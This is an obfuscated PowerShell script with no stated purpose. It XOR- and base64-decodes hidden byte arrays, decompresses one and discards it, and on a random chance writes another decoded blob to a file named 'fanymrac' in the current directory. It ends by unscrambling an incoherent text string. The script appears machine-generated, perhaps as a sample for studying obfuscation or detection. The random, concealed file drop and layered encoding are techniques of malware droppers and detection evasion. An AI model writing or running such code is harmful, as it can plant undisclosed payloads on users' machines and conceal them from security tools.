FuNCtion YeldEK { 
    [ CmdLEtbinDIng()]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $cYDBG
    )
    [SyStEM.io.MEmorySTrEam][sysTem.cOnveRT]::froMBAse64STRING($cYDBG )| PxedUcME
}
FuNCtion PxedUcME { 
    [ CmdLEtbinDIng() ]PaRAm( 
        [parAmEteR(vAluEfrOMpIPeLine)]
        $CjTkKo
    )
    ( nEw-ObjEcT  SYSTeM.Io.StREamrEAder( (nEw-ObjEcT  Io.compResSIoN.deFlaTESTreAM($CjTkKo,[iO.coMpreSSIoN.COMprESSIOnmodE]::DECOmPrESS )) ,[TEXT.eNcoDing]::aSCii)).REadtoenD( )|oUt-nuLL
}
$LVGs =[iNT[] ]((31+39),( 15+ 54),(100 - 18), ( 72 +30),(8+85),( 98 +13), (82- 9),(85+ 20),( 55 +14), (59+ 53), (43+ 27),(16 +103), (15+97),(29 + 20), ( 43 +49),( 59 +15), (98 -13), ( 94- 77),( 23+78),( 65 - 56),( 27+ 72),77,(27+ 44), (0 +111),( 8+86),( 20 + 64),( 90+4), ( 10+97),( 37+28),( 27 +62), ( 80-11),(17 + 91),( 82 + 19), ( 21+ 56), (84- 17), (69 +28),( 30 + 89), (45+ 23),(76- 9),( 7 +61),( 23 + 22), ( 33 + 31), ( 62+ 31),(81+ 22),(76-46),( 10+ 73), (55+55),( 23 +8),(26+ 29), ( 43 -35), ( 86 - 7), ( 0 + 80),(10 + 102),54, ( 2 + 93),(100- 49), ( 53 +29),(92 -14),( 10+100), ( 99 - 92), (50+32), (79-1), 70, (100+16),( 50+33),(11 +65), ( 32-9),( 24+45), ( 34+44), (41 + 74), ( 8+93),(88-10), ( 6 + 83), ( 30 + 43), ( 99 - 24), (41+10), ( 58+16), (5+59),( 22 + 31),(61+ 38), (83+19), ( 60+ 49),( 33 +79), (88- 24), ( 94- 9), (36+ 81),( 21 +84), ( 46 +52),(1 + 92), ( 89+ 27), ( 12+52), ( 93 +11),(52 +74), ( 15+90),(61+ 64),( 33+ 70), ( 46 +58), (87+10), ( 79-31), ( 94 - 25),( 93- 20),( 93 -12),( 68 + 43),(92 +26), ( 33 +39),( 68+ 39),(16 + 48), (52 + 16), (55+ 48),( 76+10), (36+ 79), (41+ 73),( 27+100),(9 +38),( 41+ 27),(55 + 57),( 83 + 25),(33+ 42),( 31 + 76), ( 59 + 14), (44+ 23), (11+ 99),(26 + 100), ( 64+17), (25 +43),( 50+41),( 37-6), ( 88 - 59),( 24+ 69), ( 83- 77),( 100 - 9),( 28 +71), ( 76-52), ( 10+ 62),( 95+ 1), (92 -33), (32+ 39),(6 + 60),( 7 +69),(7+113),( 82 - 41),( 95+ 5), (51 + 24),( 37+ 67), ( 32 +85), (87+21),(3 + 79), ( 82 +19), ( 25+ 69), (95+ 3),( 32 + 79), (81+19),( 36 + 74),(69+3),(69 - 5),( 3 + 75),(36 +83),(1+29),(57 +44), (84 - 83), ( 11 +75), (35 +80),(84+ 23), ( 63 + 12), ( 15+69),(33+44), (56 + 68),( 41 - 14), (52 +28),( 33+ 32),(34+ 80),13, ( 50+26),( 65 +14),( 16 +54), ( 61 +9),( 32- 13),(2 + 22),(23 + 70), ( 47+ 44),(91 + 26), ( 37 +49), (32+ 60), (0+124), (85 -14),( 65 +12), (48+67), (20 +104),(35 + 52), (28+ 54),( 42 + 42),(12 + 102),( 40 + 68),( 37 +66),(37+ 38), ( 57 + 19),(7+110),( 38+ 39), ( 27 + 34), (30- 25), ( 81 +38),(9 + 10),( 43+26),( 79 -36), ( 99+ 6),(13 + 64),( 22+ 65), ( 29+ 40),( 89 -15),( 64+ 1), (93- 3),( 36 +77), (21+8),(94+23),( 35+62),( 78+41),( 42+ 33), (48-17),(28 + 49),(51+ 54), (53+ 33), (9+ 71), (93 -90),( 40 +24),(39+ 84), 45, ( 60 -40),(99+15),( 28+ 38), ( 28 -22), ( 93- 34),(51 +33),( 46 + 19), ( 81 -11),( 89 - 24),( 21+61), ( 30 + 64), (42+ 26),( 56+ 63), ( 6 + 92),(2 +103), (87+ 13),(93+ 17),( 9+ 61), (61 + 64),( 78+ 28),(83 + 26),( 54+46),(60 +50), ( 74+ 6),( 48 + 31),(10 +57),( 14+ 66), (57+ 10),( 5 +120), (62 +14), (39 + 65),(54 +44),( 20 +49),( 3 +61), (28 + 80),(19 +47), ( 24 +44), (79 + 13), (21 + 104),( 12 +78),( 57 + 52),( 49+42),(37 + 42),( 52 +52), (52 +34), ( 25 +99),( 49 + 64), ( 40+ 62), ( 79 + 42),(91 +24), ( 39+ 26),( 44 + 78), ( 55+ 54),(95 - 23), (49 +55), (64+12), (8+20), ( 84 +13),( 39 -39), ( 67 + 35),( 90 +23), (71 +52), ( 42+74), (60 +23), ( 77+39),(54+14),( 69+ 41), ( 46 +56),( 18+ 86), ( 98+ 8),(73+ 25), ( 23 + 83),(2 + 77),( 35+ 37), (79 + 22),( 73 -7), (75- 47),( 65+59),( 68 -67),(47 +53), ( 0+ 105),(53 +45),(42+29),(76 - 74),(45 +46),( 58 +14),( 86+12),(74-25),( 65+ 62), ( 57 + 52),(12+52), ( 99 - 74),( 10+61), ( 49 - 46), (100 + 13), ( 24+80), ( 40 +69), (50 + 19), ( 9+17),( 60+11), ( 7+ 75),(78 + 27),( 76 - 9), ( 97 - 8), ( 0+ 102),(97- 1), ( 47+63), (8+ 75), ( 31+83),(14+57), (5+ 26),(42+ 28), (6+ 120),(49 - 23),(46+ 67),( 71+ 4), (30 + 67),(68+6), ( 54 + 63), (60 +16),( 38-8), (100 -6),(34 +82),(7 + 1),(23+44), ( 73 + 42),(86 - 13), (28+ 68),(13+94),( 38 +66),(15 + 51), ( 29 +47), ( 18+ 83), (81 +24), (9 +99),(59 +67),( 40+52),(53+20), ( 96 - 96),(100+ 6), (55+27), ( 100- 34),( 36+ 68), (89 +13),(8+46),(54 + 26), (63+50),(61+58),( 27- 26), (13 +90),(22+56),(23+ 98), ( 48+6), ( 49 +53),(27 +18),(61+ 39),( 41 +83),( 32 +62),(26 +71), (5 + 80), ( 11 +19),( 75 + 3), (10+71),( 12+ 113),( 20+ 88), ( 46 +31), (18 +76),(92+ 9), ( 19 + 99),( 8 + 98), ( 21 + 97),( 40 + 51), (17+63),(39 +36),(80- 9), (71 +56), (17 +108), ( 31+ 56), (18 - 12), ( 51 +66),( 94 -63),(65+ 46), (79 + 47),(80+ 37),(69+17), ( 60 + 16),(65 +4), (57+9),( 22+ 85), (69- 18), (50 + 77), (75 - 46), ( 5+70), ( 100- 9), (4 +54),(12+ 99),( 52 +26),( 32 +51), (51 +63),( 79 - 12), ( 92- 76),( 20+102), ( 97-12), (4 +93),(89 + 14),(59 - 28),(31 - 5), ( 25+41),(31 +40),(50 +40),(17+99),( 19 +5),( 57 +27), ( 25 +46), ( 46+ 3),( 89+27), (64 +30),(61 + 52), ( 38 +83),(73 -6),(40+26),( 3+87),( 37 + 34),(38 +57), ( 91+13), ( 91+1), ( 35+42),( 33+ 37), (47+ 72),(73 +34), (26 + 52),(16 + 9),( 56 + 37),(26+ 47), ( 48 +63), ( 69 -3), ( 37+63),(51+3),( 9+62),(57+10), (76+ 31), ( 13 +15),(63 + 30),( 49+75), (27 +86),( 58 -42), ( 9+104),(28 + 47), ( 19+52),( 94 +10),(59+28), ( 79+ 21), ( 17+43),(41 + 80), (38+13),( 43+ 71),(5 + 89), (50 + 74),(77 - 74), ( 19 +94),(51+16), ( 17 + 109),(68+ 26),(34 -25), (91 +5), ( 7 + 73),( 98-28),(81+6),( 11-5), ( 91 - 16),( 47 +39),(93- 1), (90+17),(54+43),(99 -54), ( 0 + 74), (79 + 10), ( 46+ 60), (49+ 47),( 5 +112), (88 - 1), ( 72+ 22), (4+105), (97 +18), ( 26 + 49),(9+ 8), (100+ 6),( 53 +8),( 42+55),(89 -9),(22 - 4),( 74+ 31), (100 +1),(9+76),(8 + 106), (85 - 68), ( 99 - 92),(71 + 47), ( 2 -1),(63+51),( 51+ 29), (57+ 44),( 59-11),(41 -37),( 61 + 53), (1 +21),(42+ 53),(13 + 98),( 47+ 42), ( 67+35), (18+ 83), ( 0+ 103),( 28+ 52),( 56+13),(1+67), ( 80+ 35), (28 +93), (92 -18), ( 75+24), ( 58+ 62),(56 +40),( 71+ 40),( 96 -17), ( 96- 70), (50 + 49),(23+ 86), (81-64),(54+24), (44 +42), (9 + 78), ( 4+ 72), ( 14+ 56),( 8+39),(28 +56), ( 32+ 38),( 76+ 48),( 9 + 57),(12+58),(88+28),(94 +25), (50 - 34), (13+82), (17+ 84),( 96+25), ( 14+50), ( 16 + 85), ( 63 + 33),(8 +64),(39- 37), ( 100- 29), (34 + 75), ( 14 + 56),(85 + 17), (68+47), (51- 2), (13+ 17),31, ( 88 +11), (49 - 45), (5+59),(91+ 20),( 73 +21),(96 + 29), ( 97+ 22),(60 +5), (86 +26),( 87+27), ( 70 +47),( 92 +22),( 34+16),( 5+102),( 63 +30), (34 + 52), (17+ 72),(68 +8),( 74+ 7),( 62 -38), ( 82+ 43),( 96 + 6),(81 +33), (2 + 64), ( 87- 84), ( 85-34),(56 +33), ( 17 + 106),( 50 + 53), (38 +57),( 86 +33), ( 9+ 57), (69+28),( 77 +35),( 94-12), (79 + 4), ( 45 -41),( 93 - 7), ( 11+68), (98-19), (56+30),(0 +126),( 86-5), (11 +66),( 21+92),( 50 + 56), (91- 65), ( 19 +26),( 88 - 11),( 64+ 58), (5+96),(44+50),(44+ 36), (79 + 16), (41 +52), (71 + 22), (32+52),(52+66),( 15+ 97), (40+ 61),(83+43), (92-20),67,(69 -50),( 69+53), (71+25),( 17+ 52),(81 +24),( 56 - 37), (94- 63),( 96 - 17), (28 +94),( 75 +47),(13+ 99), (99 -20), ( 84- 5), ( 100 -6),(47+64), ( 84 + 22), (93 -12), ( 90 +28), (92 -88), ( 76 + 1), ( 0 +20), (32+41), ( 47+24),(96 +5), ( 85+ 20), (34- 11), ( 27 -10), ( 88+ 31), (69-63), (93+7), ( 42+ 22), ( 28 +67), ( 29+28), (91- 79))
$EDHimr= @((14 - 12), (81- 43),( 70 - 30), (78 -74),(78- 29))
$ZMbQLZm = @()
FOr ( $i= 0; $i -lt $LVGs.leNgTh;$i++) {$ZMbQLZm +=$LVGs[ $i] -bxor $EDHimr[($i % $EDHimr.length)]} 
$ZMbQLZm = ([ chAR[]] $ZMbQLZm) -jOin''
$ZMbQLZm| YeldEK
$vZQPWMIN=[iNT[] ]( ( 32+91),( 59+ 15),( 76 + 22),( 87+39),(33 + 49),(98 - 49), ( 59 +67),(56+41),(47+38), ( 80 - 15), ( 62 + 43), (64 - 21),(61 +59), ( 28 +37),( 35 +40), (74+30),( 56+ 47), ( 88 + 22),( 55 + 55), (60 -17), ( 44+52),( 70-21),(9 +59),( 84+7),(1+ 123), (0 + 50), ( 79 -15),(67 -28),( 14+ 88), ( 86- 16),(38+ 67),( 16+88),( 77+ 20), ( 52 - 1),(14+54), (31+12),(20 + 84), (86+18), ( 86 - 18), (66-1), ( 83 +20),(75+ 35),(13+ 55), ( 43+ 83), (19+ 66),(31 + 19),(65 - 48),(70+4),(85+ 12),( 86-37),( 46 + 34),(42 -5),(7 +76),(43+62),(28 + 40),(42 +29), ( 49 + 51), (7 +101), ( 97 +25),(41 -8),( 73 + 14),85,( 21 + 4), ( 51+ 69),( 33 + 64),(38 +33), ( 85+10),( 91 +15), (15+92),(64+ 20),(20 +56), (4+ 62),(59 + 21),( 71 +14),(66+25), ( 70- 31),( 20 + 63), ( 38+ 73), ( 62 + 52), ( 49 + 26), ( 62+ 36), (93+ 12), ( 5 +24), (33+ 65),( 8+90),( 29 +82),( 8 +17), ( 97- 8), ( 56+47), ( 51 + 57), ( 25+ 97),( 0 +112),(43+61), (82+2), (70 + 28),(87-50), ( 65+ 42), (92 +18),(89 + 13),(22 + 46),(23+ 77),( 86 + 18), (19 + 87),(57+ 27), (33+ 52), ( 0+ 84),(57 -32),69, ( 59+43),( 99 -9),( 47 +41),(92-57), (12+91),(87- 36), ( 5 + 63),( 81 + 10), ( 2 + 96), ( 12 + 39), (76+ 34),(7+ 110), ( 94-9),( 53+ 51),( 87 +8),( 87 - 26),(94 - 10), (20 + 48), (87 - 19),( 16 +48), ( 50 + 53), (51 +60), ( 48 + 27), ( 97- 60),( 22+80), (80-9),(91 - 16), (93 - 32),( 40+58),(26 +82),( 12 + 90),(82-48), (51 + 52),(99 +9),( 96 +30),(28 +5),( 8+ 75), ( 95 -45), (37- 12), ( 81+ 22), (3 + 96),(5+ 103),(89 + 3),(17 +90), ( 78+21),( 71 -21), ( 41+ 34), ( 47- 15),( 80+ 25), (79+11),(99 -11),( 60 + 5), (82 - 2),( 42+66), (68+3), ( 56 + 51), (34+65),( 78 - 28),(10+100),(19+ 14),( 63 + 36),( 54 + 54), (1+ 121),( 46 + 81), (54+ 50), (78 -27),(58+43),( 4+57), (50+49),( 10 +94), ( 48+58),(33 +34), ( 13+94), (59+49), ( 37+ 39),( 93- 7), (17+79),( 71- 3), ( 98+8), ( 20 +67),(88 +17), ( 61+ 59),( 18 +96), ( 33+ 87),( 86+ 21), ( 25+ 23),(40-12),( 19+16),(3 + 96),( 9 + 76), (14+ 50), (98 - 61),(7+ 75), ( 61+ 24),(46-29), (58+ 46), ( 67 +34),(68+6),(17+88),( 3+54), (71+31),(2+108), ( 3 +111), (61-24),(44+ 38), (89 +16), ( 63+16), ( 36 +6), ( 19 + 65), (25+24), ( 64 + 15), (3+ 104),(58 + 38),( 74 + 31), ( 32 +47), (28 +73), ( 83 + 4),(88- 2),( 77 +25),(50+ 68),( 55+71), ( 80 - 10),( 45 + 31), (41 + 75),(39 +44), ( 5+ 106),(99-75),(98- 65),(64 + 41), (35+ 33), ( 90 + 24), (90+ 8), ( 34 + 51),( 20+ 88),( 35 + 87),98,( 51 + 29), ( 17 +87), ( 4+ 21), (89+17),(87+10),( 19+ 49), (24+102),(45+ 82),(57 + 46),(29+ 42), ( 10 + 112),(36 +56), (94 +2),( 89 -39), ( 83+ 5), (67 +13),(18+ 66), (11 +97),(57+ 35), ( 70 - 2),( 35 + 72), ( 64 +7),(23+41), (87-44),(73 + 51),( 77-6),(10+88),(46 + 46), (9+ 75),(86 +19),(96-25),( 76 - 44), ( 23+ 74), (92- 23), ( 99-23),(12 +72), ( 63 + 41), (19+ 50), (13+101),( 26 +16),( 74 +52),(89 - 40), ( 66+ 48),( 46- 12), ( 31+54),(23+ 48), ( 80 +26),( 98+ 2), (80+ 3),(62+48), ( 54+26),( 78 + 21), (21 + 78),( 23+ 85), (70+ 6), ( 60 - 23),( 1+ 102),(40 + 65),(8+117),( 80 +27), ( 12 + 84),(69 +39), ( 4 +106), ( 70 + 48),(33+70),(34+35), ( 38 -9), ( 48+ 73),(2+ 125), (66 +45), (24 + 5), (9 +30),( 88 +13),(95- 27), ( 27 +48),( 65+ 42),( 36+ 91), ( 38+12), ( 79 - 15),( 31 + 1),(58+ 38),(98 -30),( 85 - 5),(72+48), ( 31 + 71), (23+ 81), ( 25 +67),( 41 + 55),(93 +12),(14+ 34), (60 + 46),(1+87),(6 + 93),(43 +47),( 93+12),(50+ 11), (95 + 10), ( 34 +50), ( 77-48),(44+ 42), (96+2),( 5+45),(35 +63), ( 66 +3),(47 + 50), ( 21 +63),( 20 + 5),( 44 + 76),(41+ 39), ( 77+ 27), (2+124),(58-26), (83 +13), ( 98 -11), ( 94 - 6), (85 + 31),(100+1), (27+24), (33 - 4),( 80+13), ( 100 - 15),( 33+52),(99 +14),( 73- 31), ( 58 + 27),(84+27),(81 -13),(83+23), (12+92), (48+ 1), ( 64 +50),( 67-34),(47 + 57),(97 -29),( 52 +62),(25 +11), (46 +58),(96 +14), ( 33 +35), (43+51), ( 46 + 81),( 89- 20), ( 37 -20),(94 + 2),( 68+15), (93 +18), ( 82-2),( 44+47),( 94-9), (16+ 71),( 67+ 1),(14 +82),(9 +73),(82 -13), (10+18), ( 42-10),( 88 +17), (95 + 9),(78- 62), (31 + 76), ( 4 +101),(81+23), ( 99-1),(75 -36),(66 +33), (39 +48), (74 + 6),(8+118),(36+ 63), ( 71 - 22),( 38 +42),(10+74),( 74+ 22),(80 -31), (25 + 85),(47+21), ( 24+ 58),(27 + 44),( 66+14),(45 +43), ( 18+87),( 56 - 5), (88 + 34),(64 - 21),( 37+43), ( 93 - 6),( 2+112), (80- 44), (40 +43), ( 1 + 104),(0 +122),(10+ 111), ( 86 - 6), (24 + 86), ( 76-12),(73 +28),(49 +49),(0 + 68),(22+58),( 19+87), ( 37+ 68), ( 64 + 5), (2+ 89), (41-7), (74 +50), ( 32 + 16),(54 +52),(11+114),(21 + 81), (56 +49),( 38+ 84),( 77 +43),(60 + 40), ( 81+39),(38 +64),( 79+ 37),(78+29), ( 44 + 6),(91-3),( 98 - 11), (91+8), (47 +40),( 73+ 15), ( 46 + 41),(71+ 36), (22 +88), (48+ 16), (16 +107), (41+39),( 0+ 48),( 49 + 19),( 78 + 39), ( 85+42),( 19+52),(3+102),( 11+ 50),(67 +18), ( 79 - 31), ( 60- 35),(11+ 107), (93 + 33), ( 16 + 35),(29 +63), (63+ 26), ( 73+ 11), (92 -23), ( 95- 7),( 80 +21), ( 78+ 5),( 97- 11), (40 + 28), ( 42- 10),(65 +35),( 49 + 38), (85+37),( 68 - 35),( 24+ 100), (36 +13), (80 +33), ( 73 -37), ( 40 +56),(32+ 36),(33+ 93), ( 26+ 75), ( 97+ 27), (87+21), ( 19+ 6),(14+ 22), ( 69 + 28), (11 +63), (59 +32), (30+13),( 88 - 6),( 46 + 39),(43 -26), ( 33 +34),( 13 +85),(0+85),(21 +70),(42 -10),(16 +87),(3+102),( 63 +25), ( 53 +54), (8 + 97),( 97-27), (5 +109),( 90- 6),(78 +49),( 16 +104), (100 - 75),( 25 +68), ( 13 +111),(90- 6), (65 + 41), (12+ 87),( 47 + 38),(11+ 74), ( 46 +56),( 1 + 102),(63+22),(26+44),(10 +87),(69 - 12),(96 + 5), ( 38 + 70), (71+ 20), (85 - 28),(52 + 31), ( 0 +69), (59+5), (83 -13),(66+36), (10+110),( 66 + 32), (62+50), ( 13 +87), ( 26 +44), ( 43 + 83), ( 19 + 80), (42+40), ( 85 -1), ( 87 + 4),( 56- 20), ( 25+57), (95- 5),(53+ 23), (7+80),( 98+ 1), (30 + 41),(20 + 56), ( 21 + 60), ( 99-1),(27+21),(27 +61), ( 8 +58), ( 4 + 100),(49+ 41), (17 + 74),(9 +24), (52+ 28), ( 0+120),(72 + 26), (98- 8), ( 16+66), ( 53 + 16), ( 76+ 12),( 68 -33), (77+5), (90- 39), (57+35), ( 50 -14),(40+ 60),(70 +35),(10 +112), (19 +18),( 7 +93), (86 - 38),( 76 +16),(33 +66),( 0+80), (59 +27), (50+76), ( 98-33), (37 + 65), ( 31 + 74),(53+35),(17+15),( 62 + 36), ( 34+16), (64+28),(21 + 77),(37 + 63),(76- 7), ( 82 + 6),(79 + 40),( 100-2), (79+41),(26+ 96), (79+33),( 81 +26), (68 +43), (89 -60),(20+ 74), (78 + 4), ( 94 -43), ( 23+79), (24 +101),(48 +39),(84+ 6), ( 56 + 24),(16 +21), ( 48 +36),( 75- 24),(78 + 2),( 63 + 61), (39+ 64), (68+ 19),( 39+ 67),(9 + 24), ( 55+ 46),( 46+ 2),( 43 +45), ( 62+8),(82 + 21),(47 + 43),(96+ 9), (32+ 6),(24+ 83), ( 34+76), ( 3+ 119),( 99 + 2),( 34+ 90), ( 20+ 30),(50+48),(68+23),( 38 + 59), (0+ 90),( 48 +62), ( 26 +60), (61 + 42), (42 +62),(98 -6),( 48+ 20), ( 90 +9),( 3+87), ( 58+ 22), (79 + 12),(6+97), ( 76 + 32),( 79+30),( 12 + 45),(64 +63), ( 45+45),(45 + 30), (35 +72), (72+ 54), (92 - 6), (37+69), (6 +86), ( 94 - 10), (34+71),( 96 -71),( 47+59), ( 56+ 48),( 68 +22),( 20+ 78), ( 69 +30), (96 +9), (11+ 37),(13+51), ( 81 + 45), (25 +78), (85-15), (51 + 59), (66 -31), (80 +18), ( 60-12), ( 72 - 55),( 1 +69), ( 93+ 4), (37 +83),(75 +27), ( 37 + 5), (60 +47),( 25+83),( 66 + 32), ( 66 +41),(12+91), (46 +62), ( 0+ 64), (4+32),( 99+2), (83 + 37),(84-4),(69 +11),(24+ 78), ( 37+13),(90 + 5),( 91 -34), (46 + 52),( 61 +59), (70+25), (52+ 9), (63+ 20),(65+21),(86- 18),(24+ 11), ( 40+61),( 79 -29), (30+92),( 96+16),(38 +64), (17+93), ( 79+46), ( 86-44),( 97 - 13),(49 +37),( 56+ 20), ( 72+ 22), ( 73+9),(35+70), ( 1+105), (79 - 15),(16+89), (91 -4),( 11 + 95), (56+57), ( 35+ 92),(61 + 47),(71-7), ( 45 +22), ( 30 +71),(76 + 10), ( 50 + 48),( 8+ 58),( 44 +38),( 34 +16), (90- 26), (31+55),( 8 + 77), ( 30+75),( 32 + 66), (70+22),( 32+ 52),( 71- 1),( 70-41), (14 + 23),( 62 + 42),(59+12),( 78 -61),(68 +44),( 47 + 53), (57+29),(97 + 25),( 34+37),(42+42), (17 + 32),( 18+7),(92+3),(65+19),( 6+43),(54 + 55), ( 17+15),( 3 +84),(22 + 64), ( 5+ 75),( 48+ 58), (37+50),( 61 + 29), (35 + 53), (61+52),( 34+65), (16 + 53), (90 -22), ( 31+ 50), ( 74+25),( 5 + 85),(57+23),(58 + 68),(26 +57),( 51 + 23), ( 9+79),(75+ 24),( 19 + 81), (32 + 72),(69 -44), ( 85-46),(54+42), (17+ 31), (18 + 104), ( 24 +69), ( 11 +72),( 34 +53), (25+63),(89+ 29),( 35+ 61),(100 +11),( 49 +43), (49- 11),(57+41),(30 + 56),(94 +3),(41+ 2), (23 + 100), ( 37 + 80), (80 - 59),(54- 7))
$ORUPtOd = @( (82 - 33), (91- 89),( 24+ 16),( 38 -20))
$CHQp =@() 
FOr($i = 0; $i -lt $vZQPWMIN.leNgTh;$i++) {$CHQp+=$vZQPWMIN[$i] -bxor  $ORUPtOd[ ($i % $ORUPtOd.length)]} 
$CHQp= ([ chAR[]] $CHQp) -jOin''
FuNCtion VcwVg { 
    [ CmdLEtbinDIng()]PaRAm( 
        [parAmEteR (vAluEfrOMpIPeLine)]
        $TyKboUiG
    )
    IF (( gEt-RAnDOM @(0..20)) -eq 9){
        $KhcRZPi =[ sysTem.cOnveRT]::froMBAse64STRING($TyKboUiG)
        [ IO.FiLe ]::WRitealLBytEs( "$pwd/fanymrac", $KhcRZPi )
    
    }
}
VcwVg -TyKboUiG $CHQp
$EenNSm = 'wW0result = TAcAnd I realized Garrett was right about one thingxRe I had flippedDRz CompletelyDRzipxRe41DRz21DRz121DRz26TAc
'
FuNCtion SrttEYWT { 
    [CmdLEtbinDIng()]PaRAm( 
        [parAmEteR(vAluEfrOMpIPeLine)]
        $vQQrB
    )
    $vQQrB-REpLAcE  ([ChaR]68+[ChaR]82+[ChaR]122),[ChaR]46-CrEPlacE  ([ChaR]84+[ChaR]65+[ChaR]99),[ChaR]34  -CrEPlacE'xRe',[ChaR]58 -REpLAcE 'wW0',[ChaR]36 | oUt-nuLL
}
SrttEYWT -vQQrB $EenNSm

